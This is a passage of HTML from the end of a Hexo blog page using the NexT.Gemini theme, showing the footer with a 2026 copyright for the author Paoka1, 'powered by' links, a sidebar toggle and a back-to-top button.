    <span itemprop="copyrightYear">2026</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Paoka1</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
